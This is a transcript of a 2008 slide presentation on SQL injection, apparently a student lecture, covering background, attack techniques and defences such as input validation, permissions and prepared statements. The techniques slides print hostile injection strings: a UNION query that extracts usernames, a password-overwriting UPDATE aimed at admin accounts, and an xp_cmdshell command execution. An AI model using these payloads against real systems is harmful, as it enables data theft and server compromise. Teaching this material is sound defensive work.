SQL Injection Anthony Brown March 4, 2008 IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions.

Slides:



Advertisements
Similar presentations
Module XIV SQL Injection
Advertisements

SQL Injection Stephen Frein Comcast.
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
How Did I Steal Your Database Mostafa
Introduction The concept of “SQL Injection”
Copyright © 2011 Pearson Education, Inc. Publishing as Pearson Addison-Wesley Chapter 13 Introduction to SQL Programming Techniques.
Copyright © 2011 Pearson Education, Inc. Publishing as Pearson Addison-Wesley Chapter 14 Web Database Programming Using PHP.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
SQL Injection and Buffer overflow
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.
A Guide to SQL, Eighth Edition Chapter Three Creating Tables.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
CSCI 6962: Server-side Design and Programming JDBC Database Programming.
Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.
Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.
(CPSC620) Sanjay Tibile Vinay Deore. Agenda  Database and SQL  What is SQL Injection?  Types  Example of attack  Prevention  References.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
PHP Programming with MySQL Slide 8-1 CHAPTER 8 Working with Databases and MySQL.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
AMNESIA: Analysis and Monitoring for NEutralizing SQL- Injection Attacks Published by Wiliam Halfond and Alessandro Orso Presented by El Shibani Omar CS691.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
Attacking Applications: SQL Injection & Buffer Overflows.
Accessing MySQL with PHP IDIA 618 Fall 2014 Bridget M. Blodgett.
Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.
Copyright © 2013 Curt Hill Database Security An Overview with some SQL.
Effective Security in ASP.Net Applications Jatin Sharma: Summer 2005.
7 1 Chapter 7 Introduction to Structured Query Language (SQL) Database Systems: Design, Implementation, and Management, Seventh Edition, Rob and Coronel.
Attacking Data Stores Brad Stancel CSCE 813 Presentation 11/12/2012.
Analysis of SQL injection prevention using a filtering proxy server By: David Rowe Supervisor: Barry Irwin.
Injection CSC 482/582: Computer SecuritySlide #1.
SQL Injection Jason Dunn. SQL Overview Structured Query Language For use with Databases Purpose is to retrieve information Main Statements Select Insert.
Sumanth M Ganesh B CPSC 620.  SQL Injection attacks allow a malicious individual to execute arbitrary SQL code on your server  The attack could involve.
WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.
Database Security Cmpe 226 Fall 2015 By Akanksha Jain Jerry Mengyuan Zheng.
JDBC CS 260 Database Systems. Overview  Introduction  JDBC driver types  Eclipse project setup  Programming with JDBC  Prepared statements  SQL.
Copyright © 2011 Pearson Education, Inc. Publishing as Pearson Addison-Wesley Chapter 14 Web Database Programming Using PHP.
Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003.
SQL Injection Attacks An overview by Sameer Siddiqui.
SQL Injection Josh Mann. What is SQL Injection  SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries.
Error-based SQL Injection
MYSQL AND MYSQL WORKBENCH MIS2502 Data Analytics.
CS320 Web and Internet Programming SQL and MySQL Chengyu Sun California State University, Los Angeles.
ADVANCED SQL.  The SQL ORDER BY Keyword  The ORDER BY keyword is used to sort the result-set by one or more columns.  The ORDER BY keyword sorts the.
Copyright © 2016 Ramez Elmasri and Shamkant B. Navathe.
SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements.
Stuff to memorise… "A method tells an object to perform an action. A property allows us to read or change the settings of the object."
SQL Injection Attacks S Vinay Kumar, 07012D0506. Outline SQL Injection ? Classification of Attacks Attack Techniques Prevention Techniques Conclusion.
Introduction SQL Injection is a very old security attack. It first came into existence in the early 1990's ex: ”Hackers” movie hero does SQL Injection.
SQL INJECTION Diwakar Kumar Dinkar M.Tech, CS&E Roll Diwakar Kumar Dinkar M.Tech, CS&E Roll
Web Database Programming Using PHP
SQL Injection By Wenonah Abadilla.
Database and Cloud Security
Database System Implementation CSE 507
CSC 482/582: Computer Security
CS320 Web and Internet Programming SQL and MySQL
SQL Injection.
Web Database Programming Using PHP
Unix System Administration
SQL INJECTION ATTACKS.
Intro to Ethical Hacking
Chapter 8 Working with Databases and MySQL
Chapter 13 Security Methods Part 3.
Lecture 2 - SQL Injection
CS3220 Web and Internet Programming SQL and MySQL
Intro to Ethical Hacking
CS3220 Web and Internet Programming SQL and MySQL
Presentation transcript:

SQL Injection Anthony Brown March 4, 2008 IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Outline Background of SQL Injection Background of SQL Injection Techniques and Examples Techniques and Examples Preventing SQL Injection Preventing SQL Injection Demo Demo Wrap-Up Wrap-Up Questions Questions IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Background of SQL Injection IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Databases: Where are they now? Fat Server Fat Client Fat Server & Fat Client MainframesX Desktop Apps X Web Apps X IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Why is SQL a standard? Relational Database Platform Independence Loose Semantics Runtime Interpretation IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Flexibility = Vulnerability Simple Injection Simple Injection Decoding Error Messages Decoding Error Messages Blind Injection Blind Injection Encoding Exploits Encoding Exploits Stored Procedures Stored Procedures Programmer Error (Faulty Logic) Programmer Error (Faulty Logic) IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

SQL Injection Techniques IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Important Symbols ‘  “Hack” --  “Comment Out” ;  “End Statement” %, *  “Wildcards”

SQL Injection Definition The input field is modified in such a way that the Database returns unintended data. Sql: SELECT FROM WHERE

Example: Database Schema Table Users Table Users –Has columns “username” and “password” –Accessed when users log in Table Customers Table Customers –Has column “phone” –Users can look up other customer phone numbers by name Application does no input validation Application does no input validation IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Returning Extra Rows with “union” Query: SELECT phone Query: SELECT phone FROM Customers WHERE last_name = ‘ ’ Input: x ’ UNION SELECT username FROM users WHERE ‘ x ’ = ‘ x Input: x ’ UNION SELECT username FROM users WHERE ‘ x ’ = ‘ x IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Modifying Records Application has password changing page Application has password changing page SQL: UPDATE users SQL: UPDATE users SET password = ‘ ’ WHERE username = ‘ ’ SET password = ‘ ’ WHERE username = ‘ ’ Input: Input: newpassword’ WHERE username LIKE ‘%admin%’ -- IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

MS SQL Server Default SQL Server setup Default SQL Server setup –Default system admin account “sa” enabled –No password!!! Supports multiple queries Supports multiple queries “Extended stored procedures”: C/C++ DLL files “Extended stored procedures”: C/C++ DLL files –Read/write external files –Access command line IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Exploiting SQL Server Use phone look-up query again: Use phone look-up query again: SELECT phone FROM customers WHERE last_name = ‘ ’ Input: '; exec master..xp_cmdshell 'iisreset'; -- Input: '; exec master..xp_cmdshell 'iisreset'; -- IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions Preventing SQL Injection

Input Validation Input Validation Input Checking Functions Input Checking Functions Access Rights Access Rights User Permissions User Permissions Variable Placeholders Variable Placeholders Stored Procedures Stored Procedures IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Input Validation Checks Checks –Type –Size –Format –Range Replace quotation marks Replace quotation marks “All input is wrong and dangerous” IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Input Checking Functions Built in character rejection Built in character rejection $sql = “SELECT * FROM Users WHERE ID = ‘”. $_GET[‘id’]. “’”; $sql = “SELECT * FROM Users WHERE ID =”. mysql_real_escape_string($_GET[‘id’]); $result = mysql_query($sql); IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Access Rights Web User vs. System Administrator – ‘sa’ IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

User Permissions Limit query access rights Limit query access rights –SELECT –UPDATE –DROP Restricted statement access Restricted statement access –Global-specific –Database-specific –Table-specific IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Variable Placeholders (?) Defense from String Concatenation Defense from String Concatenation Enforcing database data types Enforcing database data types PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?"); prep.setString(1, pwd); prep.setString(1, pwd); IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Stored Procedures Use error checking variables Use error checking variables Buffer direct database access Buffer direct database access IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Demonstration IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Conclusions SQL Injection continues to evolve with new technologies SQL Injection continues to evolve with new technologies Dangerous Effects Dangerous Effects –Access to critical information –Updating data not meant to be updated –Exploiting DBMS to directly affect the server and its resources Prevention of SQL Injection Prevention of SQL Injection –Input Validation and Query Building –Permissions and Access Rights –Variable Placeholders (Prepare) and Stored Procedures IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Questions 1) What could prevent the ‘Students’ table from being dropped? 1) What could prevent the ‘Students’ table from being dropped? 2) What is another way to prevent Injection? 2) What is another way to prevent Injection? IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

Questions? IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions

References Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January PHP Documentation Group. 07 Apr Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January PHP Documentation Group. 07 Apr Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, "Exploits of a Mom." xkcd.com. 4 Mar "Exploits of a Mom." xkcd.com. 4 Mar Finnigan, Pete. " SQL Injection and Oracle, Part One." SecurityFocus 21 November Apr Finnigan, Pete. " SQL Injection and Oracle, Part One." SecurityFocus 21 November Apr Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May Apr Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May Apr IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions Questions

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.